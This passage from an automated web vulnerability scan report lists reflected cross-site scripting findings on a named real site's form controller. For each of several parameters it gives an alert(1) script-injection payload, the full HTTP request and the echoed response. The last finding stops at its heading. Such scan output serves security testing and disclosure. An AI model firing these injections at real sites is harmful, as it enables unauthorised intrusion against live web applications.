GET /quant.swf?fpf=1%2D0%2D0&videoId=document%5Fembed%5Fplayer&server=http%3A%2F%2Fflash%2Equantserve%2Ecom&doc=casestudynyplv08%2D110208115856%2Dphpapp02&publisherId=p%2DabU44ONrAuwk2&lc=%5F1298044537842%5F9208915d3<a%20b%3dc>bf11e275031&stripped%5Ftitle=hootsuite%2Din%2Dthe%2Dlibrary&qcv=2%2E1%2E1&pageURL=http%3A%2F%2Fblog%2Ehootsuite%2Ecom%2F&userName=hootsuite&flashPlayer=WIN%2010%2C2%2C154%2C12&url=http%3A%2F%2Fstatic%2Eslidesharecdn%2Ecom%2Fswf%2Fdoc%5Fplayer%2Eswf%3Fdoc%3Dcasestudynyplv08%2D110208115856%2Dphpapp02%26stripped%5Ftitle%3Dhootsuite%2Din%2Dthe%2Dlibrary%26userName%3Dhootsuite&media=widget HTTP/1.1
Host: flash.quantserve.com
Proxy-Connection: keep-alive
Referer: http://static.slidesharecdn.com/swf/doc_player.swf?doc=casestudynyplv08-110208115856-phpapp02&stripped_title=hootsuite-in-the-library&userName=hootsuite
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d5af335-78cce-d894f-1b47b; d=EJkBBgGJBg

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-shockwave-flash
Cache-Control: private, no-transform, max-age=86400
Expires: Sat, 19 Feb 2011 15:56:44 GMT
Date: Fri, 18 Feb 2011 15:56:44 GMT
Server: QS
Content-Length: 4698

FWS.Z...x.._.........D.....C....?.0....X.n.setTrace.dothetrace.allowTrace.read_so._depth.setUpLocal_lc.remote_lc.LocalConnection.LOCAL_LCNAME.rpcResult.REMOTE_LCNAME.send.local_lc.allowDomain.allowIns
...[SNIP]...
ject not saved..quant Shared object flushed to disk..quant Shared object could not be flushed to disk..write_so.idToSecs.-.indexOf.slice.parseInt.Math.floor.Date.getTime..join.1-0-0._1298044537842_9208915d3<a b=c>bf11e275031.nothetrace.3.0.0.this.logs.initialize....initialize....)..............I............................=..    ..........O..............=................@...................    .
.................R....setUpLoc
...[SNIP]...

3.5. http://forms.vendorseek.com/controller [&CCID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the &CCID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7bc4"><script>alert(1)</script>a0ea45578b5 was submitted in the &CCID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4"><script>alert(1)</script>a0ea45578b5&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:17 GMT
Connection: close
Set-Cookie: JSESSIONID=89625029A4CD9FF9F81EE602CF235862.app6-all2; Path=/
Set-Cookie: JSESSIONID=891E10200271FCF9A35D2D8BB89D5BD4.app6-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:17 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033297081; Expires=Sat, 16-Feb-2019 12:48:17 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
SiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4"><script>alert(1)</script>a0ea45578b5&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56
...[SNIP]...

3.6. http://forms.vendorseek.com/controller [&exp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the &exp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c41be"><script>alert(1)</script>31799f5b297 was submitted in the &exp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=yc41be"><script>alert(1)</script>31799f5b297&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:20 GMT
Connection: close
Set-Cookie: JSESSIONID=38B899E6AE6CF116484B12AB1EF27BA0.app6-all2; Path=/
Set-Cookie: JSESSIONID=C0DD9B714801E591C905AAF4F207287E.app6-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:20 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033300854; Expires=Sat, 16-Feb-2019 12:48:20 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
R=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=yc41be"><script>alert(1)</script>31799f5b297&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y" Type="hidden"/>
...[SNIP]...

3.7. http://forms.vendorseek.com/controller [CCID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the CCID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfb8e"><script>alert(1)</script>dfcd6822df6 was submitted in the CCID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503bfb8e"><script>alert(1)</script>dfcd6822df6&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:12 GMT
Connection: close
Set-Cookie: JSESSIONID=0E36DD64A50C2D282E735CD156668F43.app6-all1; Path=/
Set-Cookie: JSESSIONID=E2550155D6E4EFD0579CBF2B167A9C8C.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503bfb8e"><script>alert(1)</script>dfcd6822df6; Expires=Sat, 16-Feb-2019 12:48:12 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033292382; Expires=Sat, 16-Feb-2019 12:48:12 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503bfb8e"><script>alert(1)</script>dfcd6822df6&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&ex
...[SNIP]...

3.8. http://forms.vendorseek.com/controller [CLK parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the CLK request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e01a"><script>alert(1)</script>d5e0b5efd26 was submitted in the CLK parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=1661102180447168181e01a"><script>alert(1)</script>d5e0b5efd26&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:15 GMT
Connection: close
Set-Cookie: JSESSIONID=97488A1C53BFAFB108423AFF2D7F92C9.app5-all1; Path=/
Set-Cookie: JSESSIONID=AA06C727F48CC5BA4A08EED6D6E7F962.app5-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:15 GMT; Path=/
Set-Cookie: CLK=0#1298033295843; Expires=Sat, 16-Feb-2019 12:48:15 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
dorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=1661102180447168181e01a"><script>alert(1)</script>d5e0b5efd26&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf2010040619
...[SNIP]...

3.9. http://forms.vendorseek.com/controller [InternalReferralURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the InternalReferralURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aac76"><script>alert(1)</script>45061f4f32c was submitted in the InternalReferralURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=aac76"><script>alert(1)</script>45061f4f32c&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:23 GMT
Connection: close
Set-Cookie: JSESSIONID=A5BFF0A049DAE2062A18A05DB6808013.app6-all2; Path=/
Set-Cookie: JSESSIONID=6C9BC97FBF58D500C46BFF41AD62167E.app6-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:23 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033303466; Expires=Sat, 16-Feb-2019 12:48:23 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
91Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=aac76"><script>alert(1)</script>45061f4f32c&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y" Type="hidden"/>
...[SNIP]...

3.10. http://forms.vendorseek.com/controller [LeadSiteURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the LeadSiteURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33571"><script>alert(1)</script>d012466242a was submitted in the LeadSiteURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?33571"><script>alert(1)</script>d012466242a&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:11 GMT
Connection: close
Set-Cookie: JSESSIONID=5745F7537F6FF26244F0BBF2D83D9195.app6-all1; Path=/
Set-Cookie: JSESSIONID=D08D1E17C3723FAE8D5F6D0ADAD078E0.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:11 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033291167; Expires=Sat, 16-Feb-2019 12:48:11 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
Sheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?33571"><script>alert(1)</script>d012466242a&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK
...[SNIP]...

3.11. http://forms.vendorseek.com/controller [QTR parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the QTR request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3da96"><script>alert(1)</script>f7d751f0855 was submitted in the QTR parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ3da96"><script>alert(1)</script>f7d751f0855&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:14 GMT
Connection: close
Set-Cookie: JSESSIONID=0C327276CFAF6BFEE0761D648120B850.app6-all1; Path=/
Set-Cookie: JSESSIONID=FF4F447CF06837452E74C4CF33F1D184.app6-all1; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:14 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033294601; Expires=Sat, 16-Feb-2019 12:48:14 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
C_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ3da96"><script>alert(1)</script>f7d751f0855&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=201142572035
...[SNIP]...

3.12. http://forms.vendorseek.com/controller [css parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98725"><script>alert(1)</script>035a41fdd3c was submitted in the css parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

